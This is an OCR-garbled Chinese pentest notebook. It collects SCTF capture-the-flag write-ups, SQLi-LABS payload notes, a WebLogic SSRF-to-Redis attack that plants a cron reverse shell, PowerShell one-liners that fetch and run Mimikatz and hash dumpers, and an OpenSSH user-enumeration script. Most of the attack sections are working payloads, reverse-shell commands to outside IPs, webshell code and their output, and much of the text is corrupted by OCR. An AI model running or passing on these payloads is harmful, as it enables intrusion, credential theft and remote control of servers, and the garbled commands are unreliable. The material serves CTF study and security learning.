0x01 Pentest-homework-200 

http://nomework.sctf.xctf.org.cn/ 

RR ARTE À D>? HAM ZH Fo LIER 1 

顺利 登陆 之 后 是 显示 一 张 图 片 。 逮 有 一 个 homework 的 链接 。 


点 击 homework 链 接 之 和 后 是 一 个 包 好 页 面 的 网 址 。 


http://homework.sctf.xctf.org.cn/homework.php?homework=homework. 
txt 
TAF CIF EMA LH AS AAG Ao E ERALEAKR RM HRA © 
必然 的 继而 ， 包 含 不 成 功 。 


读 取 源码 搁 睛 上 卫 上 传 功能 出 了 什么 问题 。 


http://homework.sctf.xctf.org.cn/homework.php?homework=php://fil 
ter/convert.base64-encode/resource=index.php 


果断 成 功 读 取 。 然 后 把 该 读 取 的 源码 全 都 download 下 来 。 
过 审计 代码 


if(isset($ POST['upload']))( 

$filename - $ FILES['uploaded']['name']; 
$filetype - $ FILES['uploaded']['type']; 
$filesize - $ FILES['uploaded']['size']; 
$tmpname - $ FILES['uploaded']['tmp name']; 
$uploaddir - './upload/'; 

$target path = $uploaddir.basename($filename); 
$fileext = substr(strrchr($filename,"."),1); 


if(($fileext == 'gif')&&($filetype == "image/gif")){ 
{ 
if(move_uploaded_file($tmpname, $target_path)) 
L 
j 


} 
$im =imagecreatefromgif($target_path); 
srand(time()); 
$newfilename = strval(rand()).".gif"; 
$newimagepath = $uploaddir.$newfilename; 
imagegif ($im, $newimagepath) ; 
unlink($target_path); 
jelse if(($fileext == 'jpg')&&($filetype == "image/jpeg")){ 


果然 有 点 意思 ， 上 传 的 图 片 都 经 过 imagecreatefromgif 等 函数 处 理 过 了 。 

但 是 这 不 是 重点 ， 重 点 是 前 面 的 move_uploaded file($tmpname,$target_path) 
熟悉 php 代 码 的 应 该 都 知道 ， 只 是 已 经 成 功 上 传 图 片 了 的 。 

成 功 上 伟 之 后 再 进行 处 理 状 删除 源 文件 unlink($target_path);。 

所 以 ， 这 个 题目 是 时 间 训 争 ， 拼 网 速 ， 拼 人 品 。 


+4% S shell À 45 À Jj. 


fputs(fopen(base64 decode(dmlyLnBocA),w),base64 decode(PD9waHAgQ 
GV2YWwo JF9QT1NUWyd2aXJpbmsnXSk7Pz4tLSOt)); 


brup 多 线程 访问 


http://homework.sctf.xctf.org.cn/homework.php?homework=upload/vi 
rink.jpg 


广 册 上 传 。。 如 果 人 品 好 ， 很 快 就 成 功 了 。 


和 后来， 发 现 ， 写 的 Shell 莫 名 其 妙 就 没 了 ， 目 测 有 人 揽 尿 ， 然 后 我 就 写 到 /tmp 去 了 。 
2333333 


Webshell 成 功 上 传 了 ， 但 是 发 现 ， 很 多 功能 都 被 半 割 掉 了 . 
disable functions- passthru, exec, phpinfo, system, chroot, scandir,c 
hgrp, chown, shell exec,proc open,proc get status,popen,ini alter, 


ini restore,dl,openlog,syslog,readlink,symlink,popepassthru,stre 
am socket server,pcntl exec 


然后 就 是 利用 PHP 绕 过 open basedir?| B xx IHA] A BK » 


virink-printf('«b»open basedir : %s «/b»«br />', ini get('open b 
asedir'));$file list = array();$it = new DirectoryIterator("glob 
:/// /home/wwwroot/default/web/*");foreach($it as $f) ( $file 
list[] = $f->__toString();}$it = new DirectoryIterator("glob:/// 
y storeach(o91t as Sf) $file list[] = $f->__toString();}so 
rt($file list);foreach($file list as $f)fecho "{$f}<br/>"; } 


然后 就 是 读 取 flag 


virink=echo file get contents('/home/wwwroot/default/web/Aff692f 
b12aa996e27f0a108bfc386c2'); 


SCTF{g00d Good Stu6y) 


0x02 Pentest-sycshell-200 
http://58.213.63.27:61180 


右键 查看 源码 


<!-- 内 部 系统 资料 : http://sycshell.sycsec.com:61180/ --> 


改 Hosts， 然 后 用 域名 访问 。 


再 开源 码 ， 解 密 jsfuck 编 码 ， 得 到 


/WOCaiNiCaiBuDa0/read.php?f-index 


代码 审计 ， 统 过 后 包含 。 


源码 : 


<?php 
show source( FILE 9); 
$pass = @$ GET['pass']; 
$a = "syclover"; 


na, 
, 


strlen($pass) > 15 ? die("Don't Hack me!") : 


if(!is numeric($pass) || preg match('/0(x)?|-|N*|Ns|^(N. | Nd) 
.*$/i',$pass))t 
die('error'); 


} 
if($pass == 1 && $a[$pass] === "s"){ 
$file = isset($ GET['f']) ? $_GET['f'].'.php' : 'index.p 
hp'; 
@include $file; 
} 
?> 
这 里 有 一 个 大 脑 洞 ! ! | ! 有 版 本 限制 的 


根据 提示 : sycshell tip 审计 那 部 分 好 好 看 php 的 底层 代码 ， 另 外 方便 大 家 一 下 
58.213.63.27:61180/phpinfo.php 


首先 可 以 得 到 php 5.3.29 版 本 。 


版 本 漏洞 ,%0b(\v) 可 以 统 过 正则 的 \s 


/?pass=%0b.1e1 


php 底 属 源 码 
While se ==9" SEN S e ANT || ste ==") 
Str == Ww? | str == Nr) 
str++; 
length--; 
} 


这 个 题目 的 另 一 个 大 脑 洞 就 是 phpinfo()+Lfi 
然后 就 是 爆破 吧 、、2333 
$pass 统 过 这 个 脑 洞 与 phithon 牛 的 一 道 题目 类 似 的 


https://www.leavesongs.com/PENETRATION/some-sangebaimao-ctf- 
writeups.html?lan=tw&lan=tw&lan=tw 


题 三 : PHP 类 型 与 逻辑 +tfuzz 与 源 代码 审计 的 Ox03 函数 特性 导致 绕 过 部 分 。 


0x03 Pentest-DrugMarket1-300 
Drug Market: http://www.spentest.com/ 


— B] 45 3L 2€ — 18:8] * 4404 Not Found A @ » R E Mite Zr va 89 5 » RRR 
默 地 看 源码 ， 点 开 隐 藏 的 链接 了 。 


http://drug.spentest.com/ 


点 order 可 以 提交 数据 ， 然 后 没 别 的 什么 功能 了 。 可 能 存在 Xxss。 


我 继续 看 源码 ， 有 发 现 一 个 链接 。 


http://msgboard.spentest.com/ 


点 order 可 以 提交 数据 ， 然 后 没 别 的 什么 功能 了 。 可 能 存在 Xxss。 


RAR E RAR > A RSL SBE © 


http://msgboard.spentest.com/ 


打 并 页 面 直接 跳 转 到 


http://msgboard.spentest.com/index.php?action-login.php 


很 明显 的 一 个 文件 包 Tx PEE 处 看 了 下 , 没有 上 传 的 地 方 o 


再 来 研究 页 面 功能 ， 客 户 登 陆 ， 随 便 填 写 用 户 名 和 联 老 方式 之 后 发 现存 在 session 。 
É AVA PS FoR Zr NÉ A AR 


步 判 断 是 包含 session。 必 惯性 包含 /tmp/sess_XXXXXXXXXX, 发 现 闪 不 存在 。 绝 逼 
ue 


然后 就 是 要 寻找 Session 的 存放 地 址 。 首 先 就 得 读 取 apache 的 配置 文件 。 


http://msgboard.spentest.com/index.php?action=../../../../../../ 
../../etc/httpd/conf/httpd.conf 


<VirtualHost 0.0.0.0:80> 
ServerAdmin Syclover 
DocumentRoot /var/www/html 
<Directory "/var/www/html"-» 
AssignUserlId apache apache 
php_value session.save_path "/var/lib/php/session" 
</VirtualHost> 
<VirtualHost 0.0.0.0:80> 
ServerAdmin Syclover 
ServerName www.spentest.com 
DocumentRoot /var/www/webhosts/www 
«Directory "/var/www/webhosts/www"> 
AssignUserlId www www 
php value session.save path "/var/lib/php/session www" 
</VirtualHost> 
<VirtualHost 0.0.0.0:80> 
ServerAdmin Syclover 
ServerName drug.spentest.com 
DocumentRoot /var/www/webhosts/drug 
<Directory "/var/www/webhosts/drug"> 
AssignUserlId drug drug 
php value session.save path "/var/lib/php/session drug" 
</VirtualHost> 
<VirtualHost 0.0.0.0:80> 
ServerAdmin Syclover 
ServerName msgboard.spentest.com 
DocumentRoot /var/www/webhosts/msgboard 
«Directory "/var/www/webhosts/msgboard"» 
AssignUserlId msgboard msgboard 
php value session.save path "/var/lib/php/session msgboard" 
</VirtualHost> 


顺利 知道 session 的 存放 地 址 高 /varlib/php/session_msgboard 


Username 或 者 Contact $ 入 


http://msgboard.spentest.com/index.php?action=../../../../../../ 
../../var/lib/php/session_msgboard/sess_rb2rbfrie8rku2n81dq52vgh 


po 
然后 就 是 进一步 收集 信息 


virink=phpinfo() 


disable functions-passthru,exec, system, chroot, scandir, chgrp, chow 
n,shell exec,proc open,proc get status,popen,ini alter,ini resto 
re,dl, openlog, syslog, readlink, symlink, popepassthru, stream socket 
_server 


其 他 站 点 都 没有 功 问 权限 ， 默 默 地 阅读 本 站 点 的 源码 。 得 到 数据 库 连 接 信 息 。 


因 启 这 个 题目 已 经 被 FB 了 ， 上 默默 地 去 收集 前 华 们 的 信息 。/tmp 目 钞 是 我 的 最 
爱 。。。23333 


看 了 一 大 堆 没 用 的 东西 ， 同 时 也 得 到 了 一 些 有 用 的 东西 ， 比 如 mysql 的 root 密 码 。。 
23333 


当时 脑 抽 了 ， 没 有 好 好 保存 ， 在 /tmp 被 英名 其 妙 地 清空 后 找 不 到 mysql 的 数据 库 相 
HIE 息 了 9 


思路 中 斯 ， 始 终 不 知道 如 何 执 行 命令 。 
反复 研究 提示 


这 是 渗透 题 哆 ， 所 以 请 不 要 园 于 你 当前 的 Shell 之 中 ， 想 办 法 渗透 到 DRUG 站 点 为 
了 让 题目 更 加 接近 监 实 环境 ， 所 以 防火 墙 规则 较为 严格 最 后 又 回 到 XSS 上 面 了 。 
局 看 过 drug 的 数据 库 ， 站 没有 管理 员 用 户 表 。 


orderX 来 X 去 没 效 果 ， 然 后 在 小 彩 伴 提示 的 情况 下 ，X 进 adminconfig 庄 面 ， 成 功 多 
取 cookie ! 


进入 管理 册页 面 ， 发 现存 在 一 个 下 载 图 片 的 功能 。 自 己 服务 器 监 匠 一 个 端口 ， 服 务 
S3 8E eI S So 还 是 在 小 彩 伴 的 提示 下 ， 监 取 80 端 口 。。 才 发 现 提 示 


然后 就 收 到 了 一 个 wget 请 求 。 
目测 存在 命令 执行 漏洞 。 
黑 科技 : $IFS 代替 空格 


上 传 一 个 反弹 的 py 脚本 
virink-fputs(fopen('/tmp/vvv.py',w),base64 decode(aW1wb3JOIHNvY2 
tl1dCxzdWJwcm9jZXNzLG9zDQpzPXNvY2tl1dC5zb2NrZXQoc29j a2VOLKFGXOlORV 
Qsc29ja2VOLINPQOt FULRSRUFNKQOKcy5j b25uZWNOKCgiNDUUNZgUMTMUMjMiLD 
gwKSkNCm9zLmR1icDIocy5mawx1bm80KSwwkQOKb3MuZHVwMihzLmZpbGVubygpLD 


EpDQpvcy5kdXAyKHMuzml sZwb5vKCksMikNCnA9c3VicHJvY2Vzcy5j YWxsKFsiL2 
Jpbi9iYXNolIiwiLWkiXSk7DQo)); 


http://vvv/flag.jpg;python$IFS/tmp/vvv.py 


成 功 得 到 一 个 bash 的 shell 。 
最 后 在 /home/drug 找 到 flag1.txt 


SCTF{b68181af58bdf261714942f0d1a823be} 


0x04 Pentest-ETO-200 
http://eto.sctf.xctf.org.cn/ 

IS AE AE 3 — E XX HAR RE > BP IRR À VES BR o 
简单 试 一 下 ， 存 在 注入 。 

然后 、 各 种 注入 都 没有 成 功 。 


È Y Sp 


ETO 相 关 不 用 再 尝试 爆破 了 哈 ， 另 外 hint 一 直 都 在 

和 从头 到 尾 都 没有 发 现 hint 在 哪里 。 

结束 后 才 发 现 ， 注 入 报错 的 时 候 ， 在 稀 话 头 里 面 返回 了 一 个 hint : //userlid=1] 

出 题 人 这 个 脑 洞 绝 逼 要 给 101 分 ， 满 分 100， 多 一 分 是 深 深 的 父 爱 。 

在 小 彩 伴 的 提示 下 ， 才 知道 这 是 一 个 xpath 注 入 。 

引 咏 被 过 滤 了 ， 但 官方 的 提示 2 说 好 好 利用 已 存在 的 字符 。 

说 明 ， 密 码 中 的 字符 在 username、email 和 role 中 存在 的 。 用 Substring() 函 数 和 逐个 字 


符 判 断 就 ok 了 


http://eto.sctf.xctf.org.cn/?action=user&id=1 and substring(//us 
er[1]/username, 1,1)-substring(//user[1]/password, 1, 1) 

用 你 的 神器 Burp 再 次 爆破 一 波 吧 。 

最 后 跑 出 32 位 的 密码 : Ywj@4791.d gToWDmceu.Eali0s2yarn 

登陆 后 就 可 以 得 到 Flag 了 


SCTF{0f61ce4eb984a4a6d3aaa31f779533df} 


0x05 Pentest-Hackme-300- 未 成 功 
http://hackme.sctf.xctf.org.cn 


坨 坨 的 不 会 做 ， 还 是 注入 。 注 入 一 向 是 我 的 弱项 。Orz...... 


根据 官方 的 提示 
1. 网 站 开发 人 员 经 常会 去 看 备忘录 2. 想 办 法 拿 到 管理 员 密 码 3. 注 意 观 察 数据 库 连 接 
方式 4.XSS 


以 及 小 伙伴 的 提示 : PDOA ° 
百度 得 到 : PDO 方 式 的 数据 库 连 接 ， 可 以 insert 注 入 。 


折腾 一 香 到 也 弄 出 个 样子 。 


http://hackme.sctf.xctf.org.cn/index.php?id=0; /*!50000insert*//* 
!50000into*/beiwanglu(id, time, event )/* !50000values*/(9, 'virink', 
/*150000select*/(/*!50000hex*/(/*!5000010ad file*/(0x2F6574632F7 
06173737764))));9*23 


成 功 X 到 了 管理 员 的 COOKIE。。。 


再 根据 提示 想 办 法 拿 到 管理 员 密码 可 以 大 概 知道 下 一 步 可 能 是 劫持 表单 ， 获 取 管 理 
员 的 密码 。 


然而 ， 我 就 不 会 了 。 


XSS 比 SQL 注入 更 渣 ~~Orz.…. 


0x06 写 在 最 后 
最 终 以 0x01-0x04+ 签 到 10 分 的 总 分 910 分 结 来 本 次 CTF。 


脑 洞 还 是 不 够 大 ， 经 验 太 少 。 而 且 还 犯 傻 。 很 多 关键 的 地 方 和 非 关 键 地 方 都 陷入 了 
思维 误区 ， 没 有 小 伙伴 提示 的 话 ， 我 估计 也 就 能 拿 个 10 分 的 签到 分 了 。 


SQLI-LABS 是 一 个 专业 的 SQL 注入 练习 平台 ， 用 于 学 习 SQL 注 入 的 各 种 姿势 及 
原理 © 


info 
下 面 的 测试 场景 都 支持 GET 和 POST 两 种 注入 方式 


1. 报错 注入 (联合 查询 ) 
1) 字 符 型 
2) 数 字 型 
2. 报错 注入 (基于 二 次 注入 ) 
Biz 
1) 基 于 布尔 值 
2) 基 于 时 间 
. UPDATE 型 注入 练习 
. INSERT 型 注入 练 
. HTTP 头 部 注入 1) 基 于 Referer 2) 基 于 UserAgent 3) 基 于 Cookie 
二 次 排序 注入 练习 


NO 人 上 


Less 1-8 note 
联合 查询 (正确 信息 的 利用 ) 
logic: 


if correct: 


echo ‘Your Login name:'. $row[ 'username']; 
echo ‘Your Password:' .$row['password']; 
if error: 


print_r(mysql_error()); 


payload ?id=") union select 1,table_name,3 from 
information schema.tables where table schema-'security' --+ 


Lesson 1 GET- RT 4ix- 单 引 号 -字符 型 


$id-$ GET['id']; 
id=1' -> ''1'' LIMIT 0,1' at line 1 

$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1"; 
LIMIT £TAPH BmAln > 3x € OA > WRIN 


Lesson 2 GET - 基于 错误 -数字 型 
$id-$ GET['id']; 


id=1' -> '' LIMIT 0,1' at line 1 
$sql="SELECT * FROM users WHERE id=$id LIMIT 0,1"; 


Lesson 3 基于 错误 - 单 引号 变形 -字符 型 
$id-$ GET['id']; 


id=1' -> ''1'') LIMIT 0,1' at line 1 
$sql="SELECT * FROM users WHERE id=('$id') LIMIT 0,1"; 


Lesson 4 基于 错误 - 双 引 号 -字符 型 
$id-$ GET['id']; 


$id = '"' , $id . QUE 
$sql-"SELECT * FROM users WHERE id=($id) LIMIT 0,1"; 


id=1 id=1" -> near "1"") LIMIT 0,1' at line 1 


?id=") union select 1,table name,3 from information schema.tables 
where table schema-'security' --+ 


二 次 注入 (错误 信息 的 利用 ) 


logic: 


if correct: 

echo MY OUALLA see. E 
if error: 

print r(mysgql error()); 


payload: 


1.floor and (select 1 from (select 
count(*),concat(version(),floor(rand(0)*2))x from 
information schema.tables group by x)a); --+ 2.ExtractValue 
extractvalue(1, concat(0x5c, (select table name from 
information schema.tables limit 1))); --+ 

3.UpdateXml and 1=(updatexml(1, concat (0x5e24, (select 
user()),0x5e24),1)) --+ 


Lesson 5 基于 报错 信息 


$id-$ GET['id']; 
$sql-"SELECT * FROM users WHERE id-'$id' LIMIT 0,1"; 
id=1' -> near ''1'' LIMIT 0,1' at line 1 


?id-1' and (select 1 from (select 
count(*),concat(version(),floor(rand(0)*2))x from 
information schema.tables group by x)a) --- 


Lesson 6 基于 报错 - 双 引 号 


$id-$ GET['id']; 
$id 二 RSI E 
$sql="SELECT * FROM users WHERE id=$id LIMIT 0,1"; 


?id-1" and (select 1 from (select 
count(*),concat(version(),floor(rand(0)*2))x from 
information schema.tables group by x)a) --+ 


and 


无 输出 信息 -outfile 


logic: 


if correct: 

echo ‘You are in.... Use outfile...... ; 
if error: 

echo 'You have an error in your SQL syntax'; 


payload: ?id=2")) union select 1,2,3 into outfile " (此 处 要 有 权限 的 绝对 
路 径 ) union2.txt" - -+ 


error: 


'union2.txt' already exists 
'/union2.txt' (Errcode: 13 - Permission denied) 


Lesson 7 Dump into outfile 


$id-$ GET['id']; 
$sql="SELECT * FROM users WHERE id-(('$id')) LIMIT 0,1"; 


布尔 育 注 


我 们 从 枚 举 开 始 ， 尝 试 截断 查询 。 注入 了 一 些 查询 后 ， 会 发 现 我 们 并 没有 在 屏幕 上 
看 到 错误 信息 。 因 此 我 们 不 能 确定 在 这 个 网 页 上 是 否 存在 注入 。 这 也 是 为 什么 这 种 
类 型 的 注入 叫做 育 注 。 通 常 有 两 种 类 型 育 注 ， 基 于 布尔 的 和 基于 时 间 的 注入 。 


logic : 


if input correct: 

echo YOU a e HI er fe aod es E 
if error: 

no output 


function: 


database) 
substr() 
ascii() 


payload: and (ascii(substr((select table name 
information schema.tables where table schema-database()limit 0,1) 
;1,1)) ="107 --+ 


Lesson 8 Blind-Boolean based 


$id-$ GET['id']; 
$sql-"SELECT * FROM users WHERE id-'$id' LIMIT 0,1"; 


weblogic ssrf^ redis 7|; 


0x01: 


测试 环境 

WebLogic Server 版 本 : 10.3.6.0 
windows server r2 2008 x64 

IP 地 址 :192.168.224.135 


redis 版 本 : redis-3.0.7 
Red Hat Enterprise Linux Server release 5.8 
IP 地 址 : 192.168.224.137 


远程 监听 主机 IP 地 址 : 192.168.224.130 


0x02: 


Redis 任意 文件 写 入 现在 已 经 成 为 十 分 常见 的 一 个 漏洞 ， 一 般 内 网 中 会 存在 root 权 

及 运行 的 Redis 服务 ， 这 里 测试 利用 http 协 议 攻 击 内 网 中 的 Redis， 这 无 疑 可 以 隔 
2t , cae 网 。 Sa ae Redis 的 命令 ， 然 后 转化 为 http 可 用 的 
协议 。 第 见 的 exp 是 这 样 的 : 


redis-cli -h $1 flushall 

echo -e "MANN AMEN bash ie /dev/ tep7 172719 ..232228/ 2333 
O>&1\n\n"|redis-cli -h $1 -x set 1 

redis-cli -h $1 config set dir /var/spool/cron/ 

redis-cli -h $1 config set dbfilename root 

redis-cli -h $1 save 

redis-cli -h $1 quit 


利用 nc 或 socat 监 听 6379 端 口 ， 然 后 再 用 这 个 脚本 攻击 自身 或 者 其 他 监听 6379 主 
机 ， 并 抓 包 得 到 数据 流 : 


nc -| -vv -p 6379 


C 监 听 的 话 回 车 换行 的 话 ， 不 明显 : 
GEE 








C:\> 
CsNonc -1 -vu -p 6379 


自在 监听 [任何 一 个 《多 个 >] 6379 ... 
192.168.224.137: 反 向 连接 查询 主机 : h_errno 11004: 无 数据 


连接 到 (192.168.224.130] 36 <UNKNOWN> [192.168.224.137] 54966: 


无 数据 


正在 监听 [任何 一 个 £ ZA Lh N r sas 
192.168.224.137: RIMÉRÉIR EP: herrno 11004: 无 数据 


连接 到 [192.168.224.130] X Á CUNKNOWUN> [192.168.224.137] 54967: 无 数据 





1:34.012184 length=1 





from=0 to= 


*/1 * * * * bash -1 >& /dev/tcp/104.251. 


DE E D 


S 
Hr 


\ r 
> 2015/11/24 06:02:39.073389 length=89 


$ 数 字 标 识 数 据 长 度 ，* 数 字 不 知道 标识 什么 : 


from=0 to=88 





PANT 

$8\r 

flushall\r 

dc 

$3\r 

set\r 

$1\r 

1\r 

$63\r (除去 反弹 1p 端 口 字符 串 ， 剩 余 43 ) 


*/1* * * * bash -i >& /dev/tcp/192.168.224.130/55555 0»&1 


XT 

*A\r 
$6Nr 
config\r 
$3\r 
set\r 
$3\r 
dir\r 
$16\r 
/var/spool/cron/\r 
*A\r 
$6\r 
config\r 
$3\r 
set\r 
$10\r 
dbfilename\r 
$4\r 
root\r 
ZANT 
$4\r 
save\r 
SENE 
$4Nr 
quit\r 


ssrf: 


/uddiexplorer/SearchPublicRegistries.jsp?operator=http://www.bai 
du.com:80&rdoSearch-name&txtSearchname-sdf&txtSearchkey-&txtSear 
chfor=&selfor=Business+location&btnSubmit=Search 


如 何 构造 Url 请求， 先 看 乌云 峰会 猪 猪 侠 两 张 图 片 : 
WebLogic SSRF 漏洞 利用 CRLF HTTP 头 注入 (0-day) 


operator= [rootQwuyun.org ~]# nc -| 80 
POST 
(rn) fuzz wuyun.com 
User-Agent: Java1.6.0_11 
(nn) | Host: wuyun.org 


operator= | [root@wuyun.org ~]# nc -| 6379 
(\r\n) POST 

config set dir /etc/cron.d/ | config set dir /etc/cron.d/ 
(\r\n) quit 

quit (nn) HTTP/1.1 FASE 


ir T eee LAN Bae ^h 2016 
é- GZ WooYun ED iae 


WebLogic SSRF 漏洞 利用 CRLF HTTP 头 注入 (0-day) 


operator= [rootQwuyun.org ~]# nc -| 80 
POST 
(rn) fuzz wuyun.com 
| User-Agent: Java1.6.0_11 
(nn) | Host: wuyun.org 


operator= | [root@wuyun.org ~]# nc -| 6379 
(\r\n) POST 

config set dir /etc/cron.d/ | config set dir /etc/cron.d/ 
(nn) quit 

quit (\r\n) HTTP/1.1 





利用 CRLF HTTP 头 注入 ， 在 完整 的 数据 包 上 构造 利用 代码 : 


http://192.168.224.137:6379/test%0d%0a*1%0d%0a$S8%Od%Oaf lushal1%O 
d?60a * 3960 d960a$ 3960 d960a s e t?60 d960 a $1960 d?60 a 1960 d960 a$6 3960 d960a960a260a * /1 * 
* * * bash -i >%26 /dev/tcp/192.168.224.130/55555 0>%261%0a%0a% 
0a%0d%0a * 4960 d960a $6960 d?60a conf 19960 d960a$ 3960 d960 as e t960 d?60 a $3960 d?60 a d 1. 
?60d960a$169?60d960a / var / spool/cron/960d960a * 4960d960a$ 6?60 d?60a conf 1 9960 d960 
a$3960d960aset?60d960a$10950d950adb f 1ilename9?60d960a$4960 d960a r oo t 960 d960a * 1% 
0d9?60a$49?60d960a sav e?60d960a * 1960d960a$ 4960d960aqu 1.960 d960a 


然后 请 求 : 


GET /uddiexplorer/SearchPublicRegistries.jsp?operator=http://192 
.168.224.137:6379/test%0d%x0a*1%0d%0a$8%0d%0aflushall1#0d%0a * 3260 d96 
0a$3%0d%0aset%0d%0a$1%0d%0a1%0d%0a$63%0d%0a%0a%0a*/1 * * * * bas 
h -i >%26 /dev/tcp/192.168.224.130/55555 0»290261960a960a960 960 d960a * 4 
?60d960a$ 6960d960acon f 19960 0050 935 2760) d9?60a s e t 960960 a $3960 d?60 ad i. r960 0960 a $1696 
0d%0a/var/spool/cron/%0d%0a* 4960d960a$69?60d?60aconf ig%0d%0a$3%Od%0as 
et%0d%0a$10%Od%Oadbf ilename%0d%0a$4%Od%Oar oo t?60 d960a * 1960 d?60 a $4960 d 
?60asave?50d9?50a * 19560 d960a$4960 d960aqui t?60d960a& r doSearch=name&txtSearch 
name-sdf&txtSearchkey-&txtSearchfor-&selfor-Business*location&bt 
nSubmit-Search HTTP/1.1 

Host: 192.168.224.135:7001 


0x03: 


测试 过 程 如 图 : 
启动 redis 服 务 ， 同 时 130 上 监听 55555 端 口 : 


. @ 2192.168.224.137:22 [2] + 


25719:M 24 Nov 06:20:42.614 * Increased maximum number of open files to 10032 (it was or 


24). 
:20:42.614 # Warning: 32 bit instance detected but no memory limit set. 
Setting 3 GB maxmemory limit with 'noeviction' policy now. 


Redis 3.0.7 (00000000/0) 32 bit 


Running in standalone mode 
Port: 6379 
PID: 25719 


http://redis.io 


25719:M 24 Nov 06:20:42.615 # WARNING: The TCP backlog setting of 511 cannot be enforced 
because /proc/sys/net/core/somaxconn is set to the lower value of 128. 

25719:M 24 Nov 06:20:42.616 # Server started, Redis version 3.0.7 

25719:M 24 Nov 06:20:42.616 # WARNING overcommit memory is set to 0! Background save may 
fail under low memory condition. To fix this issue add 'wm.overcommit memà 1' to /e 
tc/sysctl.conf and then reboot or run the command ‘sysctl vm.overcommit meiery=1” for th 
is to take effect. 

25719:M 24 Nov 06:20:42.616 * DB loaded from disk: 0.000 seconds 

25719:M 24 Nov 06:20:42.616 * The server is now ready to accept connections-on.pórt 6379 


{rx 





€ 1192.68.224137:22 [0] b + 


[root@redhat cron]# pwd 
/var/spool/cron 
[root@redhat cron]# 11 
total 9 


[root@redhat cron]# 





请 求 利 用 代码 发 包 : 


Go <ir Target: http:1192.168.224.135:7001 


















Request Response 
c c Y Y 
b Raw | Params | Headers | Hex | | Raw. | Headers | Hex | HTML | Render | 
SE A HTTP 200 OK 
> b 


ID z ROWnXKBJ3nHqxBQvbxQzGHJt290tvhyyhZSTGC4QwQgxvJT]WZNO9I-33 261335; 





Content-Length: 10781 






com/inquire!Microsoft|http: 
1%2C101190101%2C%u 








<STYLE TYPE - "text/css* MEDIA = "screen"> 


已 经 接收 到 恶意 数据 ， 保 存 : 
25719:M 24 Nov 06:20:42.616 * DB loaded from disk: 0.000 seconds 
25719:M 24 Nov 06:2 . * The server is now ready to accept connections on port 6 





Nov 
Nov 06:25: 


已 经 写 入 计划 任务 : 
@ 1192.168.224.137:22 [0] 2 192.168.224.137:22 [2] 


[root@redhat cron]# pwd 

/var/spool/cron 

[root@redhat cron]# ll 

total 0 

[rootgredhat cron] 11 

total 4 

-rw-r--r-- 1 root root 87 Nov 24 06:25 root 
[root@redhat cron]# cat root 

REDISO006b[]? 


epe x» >& /dev/tcp/192.168.224.130/55555(8»&1 





yKng-yn[rootgredhat cron]# 


130 上 成 功 反弹 到 shell : 


C:\ nc -1 -vvu -p 55555 
正在 监听 [任何 一 个 (多 个 )] 55555 ... 
192.168.224.137: 尽 回 连接 查询 主机 : h errno 11004: 无 数据 


连接 到 1192.168.224.1301 X Å <UNKNOWN> [192.168.224.1371 39824: 天 数据 


bash: no job control in this shell 
[root@redhat ^14 whoami 

root 

[root@redhat “J]# uname -a 


Linux redhat 2.6.18-388.e15 #1 SMP Fri Jan 27 17:21:15 EST 2612 #9571686 i386 G 
NU /Linux à 
[root(?redhat 1H 


NEXT > BA RMredisMiAAA MA > LA RAA T o SAT UH AR 
多 ， 欢 迎 大 家 探讨 。 


参考 : 
参考 : 








Y 


Powershell 


持续 更 新 


1、dump hash 


powershell IEX (New-Object 
Net.WebClient).DownloadString(‘https://raw.githubusercontent.com/samratashok/n 
ishang/master/Gather/Get-PassHashes.ps1');Get-PassHashes 


2 ^ d. Tpowershell/& £j Mimikatz 


powershell IEX (New-Object 

Net. WebClient).DownloadString('https://raw.githubusercontent.com/mattifestation/ 
PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1'); Invoke-Mimikatz — 
DumpCerts 


3、 获 取 lsass.exe 的 dumps， 然 后 再 用 Mimikatz 从 
dumps 中 获取 明文 

powershell IEX (New-Object 
Net.WebClient).DownloadString(‘https://raw.githubusercontent.com/mattifestation/ 


PowerSploit/master/Exfiltration/Out-Minidump.ps1');"Get-Process Isass | Out- 
Minidump" 


Mimikatz.exe "sekurlsa::minidump 
Isass 504.dmp" 


4、 提 取 各 种 目标 进程 的 明文 密码 


http://www.freebuf.com/sectool/109958.html 


Dh: \iare h e 
OWOGLISIIOG 


powershell IEX (New-Object 
Net.WebClient).DownloadString('https://raw.githubusercontent.com/putterpanda/m 


imikittenz/master/Invoke-mimikittenz.ps1'); Invoke-Mimikatz 


OpenSSH FH XR 44 AC À AMA P (CVE-2016-6210) 
OpenSSH <=OpenSSH 7.2p2 


0x02 漏洞 描述 

当 我 们 使 用 不 存在 的 用 户 名 去 连接 ssh 服 务 器 时 ，SSHD 会 基于 BLOWFISH 算 法 去 
生成 一 个 假 的 密码 ， 但 如 果 使 用 存在 的 用 户 名 ，SSHD 会 使 用 SHA256/SHA512 算 
法 对 密码 进行 加 密 。 所 以 我 们 发 送 一 个 超大 密码 (>10KB) ，SHA256 算 法 计算 时 
间 就 远 长 于 BLOWFISH 算 法 的 假 密码 。 所 以 基于 这 个 原理 ， 我 们 可 以 枚 举 ssh 用 户 
名 o 


0x03 74 |t 8H 


测试 的 python 脚 本 如 下 : 


DOC 


import paramiko 


import time 


user=raw_input("user: ") 


p='A'*25000 


ssh = paramiko.SSHClient() 


starttime-time.time() 


ssh.set missing host key policy(paramiko.AutoAddPolicy()) 


EGYE 


ssh.connect('127.0.0.1', username=user, 


password=p) 


except: 


endtime=time.time() 


total=endtime-starttime 


print(total) 


分 别 使 用 本 地 内 网 对 内 网 服务 器 、 内 网 对 外 网 VPS 服 务 绒 进行 测试 


内 网 对 内 网 


首先 使 用 不 存在 的 用 户 名 进行 测试 : 


# -x- coding: UTF-8 —*- 
import paramik 

import time 

user= 
pz'A'x25000 


\iko.SSHClient 


( 
issing host key 


ssh.connect(' 
=p) 


except: 


total=endtime-st 
print(total) 


user: 
2.56133413315 





再 使 用 存在 的 root 账 户 进行 测试 : 


# -省 ~ coding: UTF-8 -*#- 
import paramiko 

import time 

user= 


'x25000 


except: 

endt ime 
total=endtime=startt 
print(total) 


user: 
8. 77338004112 





12.66 秒 >4.74 秒 ， 测 试 成 功 | 
0x04 修复 方案 


等 OpenSSH 官 网 补丁 吧 


SQL 注入 中 的 文件 读 写 总 结 
一 、MySQL 

读 文 件 

常见 的 读 文件 ， 可 以 用 16 进 制 代 替 字符 冲 


select load file('c:/boot.ini') 

select load file(0x633a2f626f6f742e696669) 

select load file('//ecma.io/1.txt') # Smb 协 议 
select load_file('\\\\ecma.io\\1.txt') # 可 用 于 DNS 隧道 


写 文 件 
